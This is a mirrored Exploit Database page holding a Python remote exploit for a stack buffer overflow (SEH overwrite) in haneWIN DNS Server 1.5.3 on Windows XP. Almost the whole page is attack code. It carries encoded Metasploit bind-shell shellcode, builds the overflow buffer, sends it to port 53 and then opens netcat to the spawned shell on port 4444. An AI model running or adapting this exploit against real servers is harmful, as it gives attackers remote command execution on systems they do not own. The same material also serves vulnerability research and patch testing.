haneWIN DNS Server 1.5.3 – Remote Buffer Overflow (SEH)

• Exploit Database
• 11 阅读

• 作者： Dario Estrada
  日期： 2014-01-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/31260/

• #!/usr/bin/python
   
  # Exploit Title: haneWIN DNS Server (SEH)
  # Author: Dario Estrada (dash) https://intrusionlabs.org
  # Date: 2014-01-29
  # Version: haneWIN DNS Server 1.5.3
  # Vendor Homepage: http://www.hanewin.net/
  # Vulnerable app link:http://www.hanewin.net/dns-e.htm
  # Tested on: Windows XP SP3
  # Thanks to God, to my family and all my friends for always being there
  #
  # Description:
  # A SEH overflow occurs when large amount of data is sent to the server 
  #
  import socket, sys, os, time
   
  usage = "\nUsage: " + sys.argv[0] + " <host> \n"
   
  if len(sys.argv) < 2:
  print usage
  sys.exit(0)
   
  host = sys.argv[1]
  
  shellcode = (
  #msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
  "\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
  "\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
  "\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
  "\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
  "\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
  "\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
  "\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
  "\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
  "\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
  "\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
  "\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
  "\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
  "\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
  "\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
  "\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
  "\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
  "\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
  "\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
  "\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
  "\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
  "\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
  "\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
  "\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
  "\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
  "\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
  )
  
  nSEH = '\xeb\x06\x90\x90'
  SEH = '\xd1\x07\xfc\x7f'
  opcode = "\xe9\xdf\xf6\xff\xff"
  junk = 'A' * (2324 - len(shellcode))
  padding = 'A' * 600
  
  buff = shellcode + junk + nSEH + SEH + opcode + padding
  
  print "[+] Connecting to %s:53" % (host)
  try:
  	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  	s.connect((host, 53))
  	aix= shellcode + 'A' * (2324 - len(shellcode)) 
  	print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))
  	s.send(buff)
  	print "[*] Exploit Sent Successfully!"
  	s.close()
  	print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"
  	time.sleep(5)
  	os.system ("nc -n " + host + " 4444")
  except:	
  	print "[!] Could not connect to " + host + ":53\r"
  sys.exit(0)